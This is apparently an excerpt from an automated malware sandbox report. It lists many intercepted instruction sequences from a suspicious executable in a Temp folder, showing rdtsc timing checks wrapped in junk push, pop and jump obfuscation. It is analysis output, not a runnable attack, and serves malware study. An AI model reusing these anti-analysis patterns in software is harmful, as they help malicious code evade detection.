                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53600EB second address: 5360190 instructions: 0x00000000 rdtsc 0x00000002 call 00007F3430D3497Bh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edi, 316BC27Ch 0x0000000f popad 0x00000010 push ebx 0x00000011 pushad 0x00000012 mov bx, cx 0x00000015 pushfd 0x00000016 jmp 00007F3430D3497Ah 0x0000001b xor ecx, 018F5D98h 0x00000021 jmp 00007F3430D3497Bh 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esp], ebp 0x0000002b pushad 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F3430D34982h 0x00000033 xor ecx, 3A0987F8h 0x00000039 jmp 00007F3430D3497Bh 0x0000003e popfd 0x0000003f mov di, cx 0x00000042 popad 0x00000043 pushfd 0x00000044 jmp 00007F3430D34984h 0x00000049 or al, 00000058h 0x0000004c jmp 00007F3430D3497Bh 0x00000051 popfd 0x00000052 popad 0x00000053 mov ebp, esp 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F3430D34985h 0x0000005c rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5360190 second address: 5360196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5360196 second address: 53601C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34983h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3430D34985h 0x00000015 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53601C9 second address: 53601CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53601CF second address: 53601E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53601E0 second address: 53601F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5380BF4 second address: 5380C28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3497Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3430D34980h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3430D3497Eh 0x00000017 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5380C28 second address: 5380C3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5380C3E second address: 5380C44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5380C44 second address: 5380C7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F3430D3ED40h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3430D3ED47h 0x00000018 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5380C7E second address: 5380C96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3430D34984h 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5380803 second address: 5380807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5380807 second address: 5380819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3497Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5380819 second address: 538081F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 538081F second address: 5380852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F3430D34989h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3430D3497Dh 0x00000017 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5380852 second address: 5380862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3430D3ED3Ch 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C0E0B second address: 53C0E1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3430D3497Ch 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A0419 second address: 53A041F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A041F second address: 53A0423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A0423 second address: 53A0427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A0427 second address: 53A0444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3430D34980h 0x00000012 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A0444 second address: 53A0453 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A0453 second address: 53A0459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A0459 second address: 53A045D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A045D second address: 53A0461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A0461 second address: 53A0478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3430D3ED3Ah 0x00000012 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A0478 second address: 53A047D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A047D second address: 53A04E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3430D3ED47h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F3430D3ED46h 0x00000013 mov eax, dword ptr [ebp+08h] 0x00000016 jmp 00007F3430D3ED40h 0x0000001b and dword ptr [eax], 00000000h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F3430D3ED47h 0x00000025 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A04E2 second address: 53A04E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5380546 second address: 538054A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 538054A second address: 5380567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5380567 second address: 53805C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F3430D3ED3Ch 0x00000011 sub ah, FFFFFFF8h 0x00000014 jmp 00007F3430D3ED3Bh 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007F3430D3ED46h 0x00000022 add al, 00000058h 0x00000025 jmp 00007F3430D3ED3Bh 0x0000002a popfd 0x0000002b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53805C2 second address: 5380632 instructions: 0x00000000 rdtsc 0x00000002 call 00007F3430D34988h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3430D3497Eh 0x00000013 adc esi, 541F61E8h 0x00000019 jmp 00007F3430D3497Bh 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007F3430D34986h 0x00000027 jmp 00007F3430D34985h 0x0000002c popfd 0x0000002d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5380632 second address: 5380652 instructions: 0x00000000 rdtsc 0x00000002 mov cx, E7B7h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3430D3ED3Ah 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov eax, edi 0x00000016 mov di, BAECh 0x0000001a popad 0x0000001b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5380652 second address: 5380658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5380658 second address: 5380679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3430D3ED3Ah 0x00000015 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 5380679 second address: 538067F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 538067F second address: 5380684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A001B second address: 53A0048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3430D3497Dh 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A0048 second address: 53A004E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A004E second address: 53A0052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A0052 second address: 53A007B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3430D3ED3Bh 0x00000015 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A007B second address: 53A007F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A007F second address: 53A0085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A0085 second address: 53A008B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A008B second address: 53A008F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A008F second address: 53A0093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A0093 second address: 53A00A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A00A2 second address: 53A00B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3497Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A00B1 second address: 53A00B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A00B7 second address: 53A00BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A00BB second address: 53A00BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A027F second address: 53A028E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3497Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A028E second address: 53A02B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, 18AEh 0x00000011 mov bl, 11h 0x00000013 popad 0x00000014 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A02B6 second address: 53A02C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3430D3497Ch 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A02C6 second address: 53A02EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3430D3ED48h 0x00000012 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53A02EB second address: 53A02F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C069C second address: 53C06A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C06A0 second address: 53C06BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C06BD second address: 53C06FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov dh, E7h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c mov ah, bh 0x0000000e mov ax, 47D3h 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F3430D3ED3Bh 0x0000001d and ch, FFFFFFBEh 0x00000020 jmp 00007F3430D3ED49h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C06FE second address: 53C0715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3430D34983h 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C0715 second address: 53C0719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C0719 second address: 53C0767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F3430D34985h 0x0000000f xchg eax, ecx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F3430D3497Ch 0x00000017 jmp 00007F3430D34985h 0x0000001c popfd 0x0000001d movzx esi, di 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C0767 second address: 53C078C instructions: 0x00000000 rdtsc 0x00000002 mov ebx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, ecx 0x00000008 popad 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3430D3ED49h 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C078C second address: 53C07EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3430D34987h 0x00000009 sub si, 644Eh 0x0000000e jmp 00007F3430D34989h 0x00000013 popfd 0x00000014 movzx esi, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [774365FCh] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F3430D34985h 0x00000028 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C07EA second address: 53C07F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C07F0 second address: 53C0807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3430D34983h 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C0807 second address: 53C0848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d pushad 0x0000000e mov di, ax 0x00000011 mov dl, cl 0x00000013 popad 0x00000014 je 00007F34A2D31E6Dh 0x0000001a pushad 0x0000001b mov dh, 00h 0x0000001d push ecx 0x0000001e mov al, dh 0x00000020 pop esi 0x00000021 popad 0x00000022 mov ecx, eax 0x00000024 pushad 0x00000025 push edi 0x00000026 movzx eax, bx 0x00000029 pop edi 0x0000002a push ecx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C0848 second address: 53C08B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 xor eax, dword ptr [ebp+08h] 0x00000009 jmp 00007F3430D3497Dh 0x0000000e and ecx, 1Fh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F3430D34983h 0x00000018 adc si, A48Eh 0x0000001d jmp 00007F3430D34989h 0x00000022 popfd 0x00000023 popad 0x00000024 ror eax, cl 0x00000026 pushad 0x00000027 mov eax, 3CC3FA33h 0x0000002c pushad 0x0000002d call 00007F3430D34986h 0x00000032 pop ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C08B8 second address: 53C08C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 leave 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: 53C08C5 second address: 53C08C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
